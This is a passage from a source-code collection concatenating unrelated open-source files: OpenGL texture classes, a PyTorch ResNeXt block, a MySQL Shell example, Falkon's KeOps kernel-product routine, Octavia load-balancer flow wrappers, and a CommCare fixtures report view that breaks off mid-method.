glReadBuffer(GL_COLOR_ATTACHMENT0)
width, height = self.get_mipmap_size(level)
pixels = glReadPixels(0, 0, width, height, self.texture_format, self.data_type)
# convert to numpy array
if type(pixels) is bytes:
pixels = np.fromstring(pixels, dtype=dtype)
data.append(pixels)
data = np.array(data, dtype=dtype)
glBindTexture(self.target, 0)
glBindFramebuffer(GL_FRAMEBUFFER, 0)
glDeleteFramebuffers(1, [fb, ])
return data
def get_mipmap_count(self):
factor = max(max(self.width, self.height), self.depth)
return math.floor(math.log2(factor)) + 1
def generate_mipmap(self):
if self.enable_mipmap:
glBindTexture(self.target, self.buffer)
glGenerateMipmap(self.target)
else:
logger.warn('%s: mipmap generation is disabled.' % self.name)
def texure_wrap(self, wrap):
glTexParameteri(self.target, GL_TEXTURE_WRAP_S, wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_T, wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_R, wrap)
def bind_texture(self, wrap=None):
if self.buffer == -1:
logger.warn("%s texture is invalid." % self.name)
return
glBindTexture(self.target, self.buffer)
if wrap is not None:
self.texure_wrap(wrap)
def bind_image(self, image_unit, level=0, access=GL_READ_WRITE):
if self.buffer == -1:
logger.warn("%s texture is invalid." % self.name)
return
# flag : GL_READ_WRITE, GL_WRITE_ONLY, GL_READ_ONLY
glBindImageTexture(image_unit, self.buffer, level, GL_FALSE, 0, access, self.internal_format)
def is_attached(self):
return self.attachment
def set_attachment(self, attachment):
self.attachment = attachment
def get_attribute(self):
self.attribute.set_attribute("name", self.name)
self.attribute.set_attribute("target", self.target)
self.attribute.set_attribute("width", self.width)
self.attribute.set_attribute("height", self.height)
self.attribute.set_attribute("depth", self.depth)
self.attribute.set_attribute("image_mode", self.image_mode)
self.attribute.set_attribute("internal_format", self.internal_format)
self.attribute.set_attribute("texture_format", self.texture_format)
self.attribute.set_attribute("data_type", self.data_type)
self.attribute.set_attribute("min_filter", self.min_filter)
self.attribute.set_attribute("mag_filter", self.mag_filter)
self.attribute.set_attribute("multisample_count", self.multisample_count)
self.attribute.set_attribute("wrap", self.wrap)
self.attribute.set_attribute("wrap_s", self.wrap_s)
self.attribute.set_attribute("wrap_t", self.wrap_t)
self.attribute.set_attribute("wrap_r", self.wrap_r)
return self.attribute
def set_attribute(self, attribute_name, attribute_value, item_info_history, attribute_index):
if hasattr(self, attribute_name) and "" != attribute_value:
setattr(self, attribute_name, eval(attribute_value))
if 'wrap' in attribute_name:
glBindTexture(self.target, self.buffer)
glTexParameteri(self.target, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glBindTexture(self.target, 0)
return self.attribute
class Texture2D(Texture):
target = GL_TEXTURE_2D
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D, self.buffer)
if self.use_glTexStorage:
glTexStorage2D(GL_TEXTURE_2D,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height)
if data is not None:
glTexSubImage2D(GL_TEXTURE_2D,
0,
0, 0,
self.width, self.height,
self.texture_format,
self.data_type,
data)
else:
glTexImage2D(GL_TEXTURE_2D,
0,
self.internal_format,
self.width,
self.height,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_2D)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, self.mag_filter)
if self.clear_color is not None:
glClearTexImage(self.buffer, 0, self.texture_format, self.data_type, self.clear_color)
glBindTexture(GL_TEXTURE_2D, 0)
class Texture2DArray(Texture):
target = GL_TEXTURE_2D_ARRAY
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D_ARRAY, self.buffer)
if self.use_glTexStorage:
glTexStorage3D(GL_TEXTURE_2D_ARRAY,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height, self.depth)
if data is not None:
glTexSubImage3D(GL_TEXTURE_2D_ARRAY,
0,
0, 0, 0,
self.width, self.height, self.depth,
self.texture_format,
self.data_type,
data)
else:
glTexImage3D(GL_TEXTURE_2D_ARRAY,
0,
self.internal_format,
self.width,
self.height,
self.depth,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_2D_ARRAY)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_2D_ARRAY, 0)
class Texture3D(Texture):
target = GL_TEXTURE_3D
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_3D, self.buffer)
if self.use_glTexStorage:
glTexStorage3D(GL_TEXTURE_3D,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height, self.depth)
if data is not None:
glTexSubImage3D(GL_TEXTURE_3D,
0,
0, 0, 0,
self.width, self.height, self.depth,
self.texture_format,
self.data_type,
data)
else:
glTexImage3D(GL_TEXTURE_3D,
0,
self.internal_format,
self.width,
self.height,
self.depth,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_3D)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_3D, 0)
class Texture2DMultiSample(Texture):
target = GL_TEXTURE_2D_MULTISAMPLE
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
multisample_count = texture_data.get('multisample_count', 4)
self.multisample_count = multisample_count - (multisample_count % 4)
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D_MULTISAMPLE, self.buffer)
if self.use_glTexStorage:
glTexStorage2DMultisample(GL_TEXTURE_2D_MULTISAMPLE,
self.multisample_count,
self.internal_format,
self.width,
self.height,
GL_TRUE)
else:
glTexImage2DMultisample(GL_TEXTURE_2D_MULTISAMPLE,
self.multisample_count,
self.internal_format,
self.width,
self.height,
GL_TRUE)
glBindTexture(GL_TEXTURE_2D_MULTISAMPLE, 0)
class TextureCube(Texture):
target = GL_TEXTURE_CUBE_MAP
default_wrap = GL_REPEAT
def __init__(self, **texture_data):
self.texture_positive_x = None
self.texture_negative_x = None
self.texture_positive_y = None
self.texture_negative_y = None
self.texture_positive_z = None
self.texture_negative_z = None
Texture.__init__(self, **texture_data)
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
# If texture2d is None then create render target.
face_texture_datas = copy.copy(texture_data)
face_texture_datas.pop('name')
face_texture_datas['texture_type'] = Texture2D
self.texture_positive_x = texture_data.get('texture_positive_x', CreateTexture(name=self.name + "_right", **face_texture_datas))
self.texture_negative_x = texture_data.get('texture_negative_x', CreateTexture(name=self.name + "_left", **face_texture_datas))
self.texture_positive_y = texture_data.get('texture_positive_y', CreateTexture(name=self.name + "_top", **face_texture_datas))
self.texture_negative_y = texture_data.get('texture_negative_y', CreateTexture(name=self.name + "_bottom", **face_texture_datas))
self.texture_positive_z = texture_data.get('texture_positive_z', CreateTexture(name=self.name + "_front", **face_texture_datas))
self.texture_negative_z = texture_data.get('texture_negative_z', CreateTexture(name=self.name + "_back", **face_texture_datas))
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_CUBE_MAP, self.buffer)
if self.use_glTexStorage:
glTexStorage2D(GL_TEXTURE_CUBE_MAP, self.get_mipmap_count(), self.internal_format, self.width, self.height)
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_X, self.texture_positive_x) # Right
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_X, self.texture_negative_x) # Left
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Y, self.texture_positive_y) # Top
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Y, self.texture_negative_y) # Bottom
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Z, self.texture_positive_z) # Front
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Z, self.texture_negative_z) # Back
else:
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_X, self.texture_positive_x) # Right
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_X, self.texture_negative_x) # Left
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Y, self.texture_positive_y) # Top
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Y, self.texture_negative_y) # Bottom
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Z, self.texture_positive_z) # Front
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Z, self.texture_negative_z) # Back
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_CUBE_MAP)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_CUBE_MAP, 0)
@staticmethod
def createTexImage2D(target_face, texture):
glTexImage2D(target_face,
0,
texture.internal_format,
texture.width,
texture.height,
0,
texture.texture_format,
texture.data_type,
texture.get_image_data())
@staticmethod
def createTexSubImage2D(target_face, texture):
glTexSubImage2D(target_face,
0,
0, 0,
texture.width, texture.height,
texture.texture_format,
texture.data_type,
texture.get_image_data())
def delete(self):
super(TextureCube, self).delete()
self.texture_positive_x.delete()
self.texture_negative_x.delete()
self.texture_positive_y.delete()
self.texture_negative_y.delete()
self.texture_positive_z.delete()
self.texture_negative_z.delete()
def get_save_data(self, get_image_data=True):
save_data = Texture.get_save_data(self)
save_data['texture_positive_x'] = self.texture_positive_x.name
save_data['texture_negative_x'] = self.texture_negative_x.name
save_data['texture_positive_y'] = self.texture_positive_y.name
save_data['texture_negative_y'] = self.texture_negative_y.name
save_data['texture_positive_z'] = self.texture_positive_z.name
save_data['texture_negative_z'] = self.texture_negative_z.name
return save_data
def get_attribute(self):
Texture.get_attribute(self)
self.attribute.set_attribute("texture_positive_x", self.texture_positive_x.name)
self.attribute.set_attribute("texture_negative_x", self.texture_negative_x.name)
self.attribute.set_attribute("texture_positive_y", self.texture_positive_y.name)
self.attribute.set_attribute("texture_negative_y", self.texture_negative_y.name)
self.attribute.set_attribute("texture_positive_z", self.texture_positive_z.name)
self.attribute.set_attribute("texture_negative_z", self.texture_negative_z.name)
return self.attribute
|
models/ClassicNetwork/blocks/resnext_block.py | Dou-Yu-xuan/deep-learning-visal | 150 | 31180 | <filename>models/ClassicNetwork/blocks/resnext_block.py<gh_stars>100-1000
# -*- coding: UTF-8 -*-
"""
@<NAME> 2020_09_08
"""
import torch.nn as nn
import torch.nn.functional as F
from models.blocks.SE_block import SE
from models.blocks.conv_bn import BN_Conv2d
class ResNeXt_Block(nn.Module):
"""
ResNeXt block with group convolutions
"""
def __init__(self, in_chnls, cardinality, group_depth, stride, is_se=False):
super(ResNeXt_Block, self).__init__()
self.is_se = is_se
self.group_chnls = cardinality * group_depth
self.conv1 = BN_Conv2d(in_chnls, self.group_chnls, 1, stride=1, padding=0)
self.conv2 = BN_Conv2d(self.group_chnls, self.group_chnls, 3, stride=stride, padding=1, groups=cardinality)
self.conv3 = nn.Conv2d(self.group_chnls, self.group_chnls * 2, 1, stride=1, padding=0)
self.bn = nn.BatchNorm2d(self.group_chnls * 2)
if self.is_se:
self.se = SE(self.group_chnls * 2, 16)
self.short_cut = nn.Sequential(
nn.Conv2d(in_chnls, self.group_chnls * 2, 1, stride, 0, bias=False),
nn.BatchNorm2d(self.group_chnls * 2)
)
def forward(self, x):
out = self.conv1(x)
out = self.conv2(out)
out = self.bn(self.conv3(out))
if self.is_se:
coefficient = self.se(out)
out *= coefficient
out += self.short_cut(x)
return F.relu(out)
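# Illustrative sketch (not part of the original file): a single block with
# cardinality 32 and group depth 4 (ResNeXt-50-style numbers); the input
# shape is an arbitrary assumption.
def _example_resnext_block():
    import torch
    block = ResNeXt_Block(in_chnls=64, cardinality=32, group_depth=4,
                          stride=1, is_se=False)
    x = torch.randn(1, 64, 56, 56)
    # group_chnls * 2 = 32 * 4 * 2 = 256 output channels: torch.Size([1, 256, 56, 56])
    return block(x).shape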
|
unittest/scripts/py_dev_api_examples/working_with_collections/Working_with_Existing_Collections.py | mueller/mysql-shell | 119 | 31269 | # Get a collection object for 'my_collection'
myColl = db.get_collection('my_collection')
|
falkon/mmv_ops/keops.py | mohamad-amin/falkon | 130 | 31271 | import warnings
from dataclasses import dataclass
from typing import List, Optional
import torch
from falkon.utils.stream_utils import sync_current_stream
from falkon.mmv_ops.utils import _get_gpu_info, create_output_mat, _start_wait_processes
from falkon.options import FalkonOptions, BaseOptions
from falkon.utils import decide_cuda
from falkon.utils.helpers import sizeof_dtype, calc_gpu_block_sizes
from pykeops.torch import Genred
@dataclass(frozen=True)
class ArgsFmmv:
X1: torch.Tensor
X2: torch.Tensor
v: torch.Tensor
other_vars: List[torch.Tensor]
out: torch.Tensor
gpu_ram: float
backend: str
function: callable
def _keops_dtype(dtype: torch.dtype) -> str:
"""Returns a string which represents the given data type.
The string representation is necessary for KeOps which doesn't
like type objects.
"""
if dtype == torch.float64:
return 'float64'
elif dtype == torch.float32:
return 'float32'
else:
raise NotImplementedError("Data type %s not recognized." % (dtype))
def _decide_backend(opt: BaseOptions, num_dim: int) -> str:
"""Switch between CPU and GPU backend for KeOps
"""
if not decide_cuda(opt):
return 'CPU'
else:
return 'GPU_1D'
def _estimate_split(N, M, D, T, R, ds):
"""Estimate the splits along dimensions N and M for a MVM to fit in memory
The operations consist of computing the product between a kernel
matrix (from a N*D and a M*D matrix) and a 'vector' of shape M*T
This typically requires storage of the input and output matrices,
which occupies (M + N)*(D + T) memory locations plus some intermediate
buffers to perform computations.
TODO: It is not clear how much intermediate memory KeOps requires;
the only thing that is certain is that it is quadratic in D.
For now we sidestep this issue by using a smaller R than what is
actually available in GPU memory.
This function calculates the split along N and M into blocks of size n*m
so that we can compute the kernel-vector product between such blocks
and still fit in GPU memory.
Parameters
-----------
- N : int
The first dimension of the kernel matrix
- M : int
The second dimension of the kernel matrix
- D : int
The data dimensionality
- T : int
The number of output columns
- R : float
The amount of memory available (in bytes)
- ds : int
The size in bytes of each element in the data matrices
(e.g. 4 if the data is in single precision).
Returns
--------
- n : int
The block size to be used along the first dimension
- m : int
The block size along the second dimension of the kernel
matrix
Raises
-------
RuntimeError
If the available memory `R` is insufficient to store even the smallest
possible input matrices. This may happen if `D` is very large since we
do not perform any splitting along `D`.
Notes
------
We find 'good' values of M, N such that
N*(D+T) + M*(D+T) <= R/ds
"""
R = R / ds
# We have a linear equation in two variables (N, M)
slope = -1
intercept = R / (D + T)
slack_points = 10
# We try to pick a point at the edges such that only one kind of split
# is necessary
if N < intercept - 1:
M = min(M, intercept + slope * N)
elif M < intercept - 1:
N = min(N, intercept + slope * M)
else:
# All points on the slope such that N, M > 0 are possible
N = intercept - slack_points - 1
M = intercept + slope * N
if N <= 0 or M <= 0:
raise RuntimeError(
"Insufficient available GPU "
"memory (available %.2fGB)" % (R * ds / 2 ** 30))
return int(N), int(M)
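# Worked example (illustrative; all numbers are assumptions): with a million
# points on each side, D = 10, T = 1 and 8 GiB of single-precision storage
# (ds = 4), the intercept R / (ds * (D + T)) ~= 1.95e8 dwarfs both N and M,
# so no block splitting is required.
def _example_estimate_split():
    n, m = _estimate_split(N=10**6, M=10**6, D=10, T=1, R=8 * 2**30, ds=4)
    assert (n, m) == (10**6, 10**6)
    return n, m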
def _single_gpu_method(proc_idx, queue, device_id):
a: ArgsFmmv = queue.get()
backend = a.backend
X1 = a.X1
X2 = a.X2
v = a.v
oout = a.out
other_vars = a.other_vars
fn = a.function
R = a.gpu_ram
N, D = X1.shape
M = X2.shape[0]
T = v.shape[1]
device = torch.device(f"cuda:{device_id}")
# Second round of subdivision (only if necessary due to RAM constraints)
n, m = _estimate_split(N, M, D, T, R, sizeof_dtype(X1.dtype))
other_vars_dev = [ov.to(device, copy=False) for ov in other_vars]
out_ic = oout.device.index == device_id
# Process the two rounds of splitting with a nested loop.
with torch.cuda.device(device_id):
for mi in range(0, M, m):
ml = min(m, M - mi)
if ml != M and mi > 0: # Then we must create a temporary output array
out = torch.empty_like(oout)
else:
out = oout
cX2 = X2[mi:mi + ml, :].to(device, copy=False)
cv = v[mi:mi + ml, :].to(device, copy=False)
for ni in range(0, N, n):
nl = min(n, N - ni)
cX1 = X1[ni:ni + nl, :].to(device, copy=False)
cout = out[ni: ni + nl, :].to(device, copy=False)
variables = [cX1, cX2, cv] + other_vars_dev
fn(*variables, out=cout, device_id=device_id, backend=backend)
if not out_ic:
out[ni: ni + nl, :].copy_(cout)
if ml != M and mi > 0:
oout.add_(out)
return oout
def run_keops_mmv(X1: torch.Tensor,
X2: torch.Tensor,
v: torch.Tensor,
other_vars: List[torch.Tensor],
out: Optional[torch.Tensor],
formula: str,
aliases: List[str],
axis: int,
reduction: str = 'Sum',
opt: Optional[FalkonOptions] = None) -> torch.Tensor:
if opt is None:
opt = FalkonOptions()
# Choose backend
N, D = X1.shape
T = v.shape[1]
backend = _decide_backend(opt, D)
dtype = _keops_dtype(X1.dtype)
data_devs = [X1.device, X2.device, v.device]
if any([ddev.type == 'cuda' for ddev in data_devs]) and (not backend.startswith("GPU")):
warnings.warn("KeOps backend was chosen to be CPU, but GPU input tensors found. "
"Defaulting to 'GPU_1D' backend. To force usage of the CPU backend, "
"please pass CPU tensors; to avoid this warning if the GPU backend is "
"desired, check your options (i.e. set 'use_cpu=False').")
backend = "GPU_1D"
differentiable = any(
[X1.requires_grad, X2.requires_grad, v.requires_grad] +
[o.requires_grad for o in other_vars]
)
if differentiable:
from falkon.kernels.tiling_red import TilingGenred
fn = TilingGenred(formula, aliases, reduction_op='Sum', axis=1, dtype=dtype,
dtype_acc="auto", sum_scheme="auto", opt=opt)
return fn(X1, X2, v, *other_vars, out=out, backend=backend)
# Define formula wrapper
fn = Genred(formula, aliases,
reduction_op=reduction, axis=axis,
dtype=dtype, dtype_acc=opt.keops_acc_dtype,
sum_scheme=opt.keops_sum_scheme)
comp_dev_type = backend[:3].lower().replace('gpu', 'cuda') # 'cpu' or 'cuda'
out = create_output_mat(out, data_devs, is_sparse=False, shape=(N, T), dtype=X1.dtype,
comp_dev_type=comp_dev_type, other_mat=X1, output_stride="C")
if comp_dev_type == 'cpu' and all([ddev.type == 'cpu' for ddev in data_devs]): # incore CPU
variables = [X1, X2, v] + other_vars
out = fn(*variables, out=out, backend=backend)
elif comp_dev_type == 'cuda' and all([ddev.type == 'cuda' for ddev in data_devs]): # incore CUDA
variables = [X1, X2, v] + other_vars
device = data_devs[0]
with torch.cuda.device(device):
sync_current_stream(device)
out = fn(*variables, out=out, backend=backend)
else: # Out of core
# slack is high due to imprecise memory usage estimates for keops
gpu_info = _get_gpu_info(opt, slack=opt.keops_memory_slack)
block_sizes = calc_gpu_block_sizes(gpu_info, N)
# Create queues
args = [] # Arguments passed to each subprocess
for i, g in enumerate(gpu_info):
# First round of subdivision
bwidth = block_sizes[i + 1] - block_sizes[i]
if bwidth <= 0:
continue
args.append((ArgsFmmv(
X1=X1.narrow(0, block_sizes[i], bwidth),
X2=X2,
v=v,
out=out.narrow(0, block_sizes[i], bwidth),
other_vars=other_vars,
function=fn,
backend=backend,
gpu_ram=g.usable_memory
), g.Id))
_start_wait_processes(_single_gpu_method, args)
return out
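# Illustrative sketch (not part of the original module): a Gaussian
# kernel-vector product K(X1, X2) @ v expressed with standard KeOps Genred
# formula/alias syntax. The sizes and the bandwidth value are assumptions.
def _example_gaussian_mmv():
    d = 3
    X1, X2 = torch.randn(1000, d), torch.randn(500, d)
    v = torch.randn(500, 1)
    gamma = torch.tensor([-0.5])  # negative so that Exp(g * SqDist) decays; an assumption
    formula = 'Exp(g * SqDist(x1, x2)) * v'
    aliases = [
        'x1 = Vi(%d)' % d,  # indexed over the rows of X1 (axis i)
        'x2 = Vj(%d)' % d,  # indexed over the rows of X2 (axis j)
        'v = Vj(1)',        # one value per row of X2
        'g = Pm(1)',        # parameter shared by all pairs
    ]
    # axis=1 sums over j, so the result has shape (1000, 1).
    return run_keops_mmv(X1, X2, v, [gamma], out=None, formula=formula,
                         aliases=aliases, axis=1)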
|
octavia/controller/worker/v2/flows/flow_utils.py | zhangi/octavia | 129 | 31336 | <reponame>zhangi/octavia
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from octavia.api.drivers import utils as provider_utils
from octavia.controller.worker.v2.flows import amphora_flows
from octavia.controller.worker.v2.flows import health_monitor_flows
from octavia.controller.worker.v2.flows import l7policy_flows
from octavia.controller.worker.v2.flows import l7rule_flows
from octavia.controller.worker.v2.flows import listener_flows
from octavia.controller.worker.v2.flows import load_balancer_flows
from octavia.controller.worker.v2.flows import member_flows
from octavia.controller.worker.v2.flows import pool_flows
LB_FLOWS = load_balancer_flows.LoadBalancerFlows()
AMP_FLOWS = amphora_flows.AmphoraFlows()
HM_FLOWS = health_monitor_flows.HealthMonitorFlows()
L7_POLICY_FLOWS = l7policy_flows.L7PolicyFlows()
L7_RULES_FLOWS = l7rule_flows.L7RuleFlows()
LISTENER_FLOWS = listener_flows.ListenerFlows()
M_FLOWS = member_flows.MemberFlows()
P_FLOWS = pool_flows.PoolFlows()
def get_create_load_balancer_flow(topology, listeners=None):
return LB_FLOWS.get_create_load_balancer_flow(topology,
listeners=listeners)
def get_delete_load_balancer_flow(lb):
return LB_FLOWS.get_delete_load_balancer_flow(lb)
def get_listeners_on_lb(db_lb):
"""Get a list of the listeners on a load balancer.
:param db_lb: A load balancer database model object.
:returns: A list of provider dict format listeners.
"""
listener_dicts = []
for listener in db_lb.listeners:
prov_listener = provider_utils.db_listener_to_provider_listener(
listener)
listener_dicts.append(prov_listener.to_dict())
return listener_dicts
def get_pools_on_lb(db_lb):
"""Get a list of the pools on a load balancer.
:param db_lb: A load balancer database model object.
:returns: A list of provider dict format pools.
"""
pool_dicts = []
for pool in db_lb.pools:
prov_pool = provider_utils.db_pool_to_provider_pool(pool)
pool_dicts.append(prov_pool.to_dict())
return pool_dicts
def get_cascade_delete_load_balancer_flow(lb, listeners=(), pools=()):
return LB_FLOWS.get_cascade_delete_load_balancer_flow(lb, listeners,
pools)
def get_update_load_balancer_flow():
return LB_FLOWS.get_update_load_balancer_flow()
def get_create_amphora_flow():
return AMP_FLOWS.get_create_amphora_flow()
def get_delete_amphora_flow(amphora, retry_attempts=None, retry_interval=None):
return AMP_FLOWS.get_delete_amphora_flow(amphora, retry_attempts,
retry_interval)
def get_failover_LB_flow(amps, lb):
return LB_FLOWS.get_failover_LB_flow(amps, lb)
def get_failover_amphora_flow(amphora_dict, lb_amp_count):
return AMP_FLOWS.get_failover_amphora_flow(amphora_dict, lb_amp_count)
def cert_rotate_amphora_flow():
return AMP_FLOWS.cert_rotate_amphora_flow()
def update_amphora_config_flow():
return AMP_FLOWS.update_amphora_config_flow()
def get_create_health_monitor_flow():
return HM_FLOWS.get_create_health_monitor_flow()
def get_delete_health_monitor_flow():
return HM_FLOWS.get_delete_health_monitor_flow()
def get_update_health_monitor_flow():
return HM_FLOWS.get_update_health_monitor_flow()
def get_create_l7policy_flow():
return L7_POLICY_FLOWS.get_create_l7policy_flow()
def get_delete_l7policy_flow():
return L7_POLICY_FLOWS.get_delete_l7policy_flow()
def get_update_l7policy_flow():
return L7_POLICY_FLOWS.get_update_l7policy_flow()
def get_create_l7rule_flow():
return L7_RULES_FLOWS.get_create_l7rule_flow()
def get_delete_l7rule_flow():
return L7_RULES_FLOWS.get_delete_l7rule_flow()
def get_update_l7rule_flow():
return L7_RULES_FLOWS.get_update_l7rule_flow()
def get_create_listener_flow():
return LISTENER_FLOWS.get_create_listener_flow()
def get_create_all_listeners_flow():
return LISTENER_FLOWS.get_create_all_listeners_flow()
def get_delete_listener_flow():
return LISTENER_FLOWS.get_delete_listener_flow()
def get_update_listener_flow():
return LISTENER_FLOWS.get_update_listener_flow()
def get_create_member_flow():
return M_FLOWS.get_create_member_flow()
def get_delete_member_flow():
return M_FLOWS.get_delete_member_flow()
def get_update_member_flow():
return M_FLOWS.get_update_member_flow()
def get_batch_update_members_flow(old_members, new_members, updated_members):
return M_FLOWS.get_batch_update_members_flow(old_members, new_members,
updated_members)
def get_create_pool_flow():
return P_FLOWS.get_create_pool_flow()
def get_delete_pool_flow():
return P_FLOWS.get_delete_pool_flow()
def get_update_pool_flow():
return P_FLOWS.get_update_pool_flow()
|
corehq/apps/fixtures/interface.py | omari-funzone/commcare-hq | 471 | 31356 | from django.contrib import messages
from django.http import HttpResponseRedirect
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop, ugettext_lazy
from couchdbkit import ResourceNotFound
from memoized import memoized
from corehq.apps.fixtures.dispatcher import FixtureInterfaceDispatcher
from corehq.apps.fixtures.models import FixtureDataType, _id_from_doc
from corehq.apps.fixtures.views import FixtureViewMixIn, fixtures_home
from corehq.apps.reports.filters.base import BaseSingleOptionFilter
from corehq.apps.reports.generic import GenericReportView, GenericTabularReport
class FixtureInterface(FixtureViewMixIn, GenericReportView):
base_template = 'fixtures/fixtures_base.html'
asynchronous = False
dispatcher = FixtureInterfaceDispatcher
exportable = False
needs_filters = False
class FixtureSelectFilter(BaseSingleOptionFilter):
slug = "table_id"
label = ""
placeholder = "place"
default_text = ugettext_lazy("Select a Table")
@property
def selected(self):
# Knockout won't render the default selected value as it should, so display default_text instead
return ""
@property
@memoized
def fixtures(self):
return sorted(FixtureDataType.by_domain(self.domain), key=lambda t: t.tag.lower())
@property
@memoized
def options(self):
return [(_id_from_doc(f), f.tag) for f in self.fixtures]
class FixtureViewInterface(GenericTabularReport, FixtureInterface):
name = ugettext_noop("View Tables")
slug = "view_lookup_tables"
report_template_path = 'fixtures/view_table.html'
fields = ['corehq.apps.fixtures.interface.FixtureSelectFilter']
@property
def view_response(self):
if not self.has_tables():
messages.info(self.request, _("You don't have any tables defined yet - create tables to view them."))
return HttpResponseRedirect(fixtures_home(self.domain))
else:
return super(FixtureViewInterface, self).view_response
@property
def report_context(self):
assert self.has_tables()
if not self.request.GET.get("table_id", None):
return {"table_not_selected": True}
try:
context = super(FixtureViewInterface, self).report_context
except ResourceNotFound:
return {"table_not_selected": True}
# Build javascript options for DataTables
report_table = context['report_table']
headers = report_table.get('headers')
data_tables_options = {
'slug': self.context['report']['slug'],
'defaultRows': report_table.get('default_rows', 10),
'startAtRowNum': report_table.get('start_at_row', 0),
'showAllRowsOption': report_table.get('show_all_rows'),
'autoWidth': headers.auto_width,
}
if headers.render_aoColumns:
data_tables_options.update({
'aoColumns': headers.render_aoColumns,
})
if headers.custom_sort:
data_tables_options.update({
'customSort': headers.custom_sort,
})
pagination = context['report_table'].get('pagination', {})
if pagination.get('is_on'):
data_tables_options.update({
'ajaxSource': pagination.get('source'),
'ajaxParams': pagination.get('params'),
})
left_col = context['report_table'].get('left_col', {})
if left_col.get('is_fixed'):
data_tables_options.update({
'fixColumns': True,
'fixColsNumLeft': left_col['fixed'].get('num'),
'fixColsWidth': left_col['fixed'].get('width'),
})
context.update({
"selected_table": self.table.get("table_id", ""),
'data_tables_options': data_tables_options,
})
if self.lookup_table:
context.update({
"table_description": self.lookup_table.description,
})
return context
@memoized
def has_tables(self):
return True if list(FixtureDataType.by_domain(self.domain)) else False
@property
@memoized
def table(self):
from corehq.apps.fixtures.views import data_table
if self.has_tables() and self.request.GET.get("table_id", None):
return data_table(self.request, self.domain)
else:
return {"headers": None, "rows": None}
@cached_property
def lookup_table(self):
if self.has_tables() and self.request.GET.get("table_id", None):
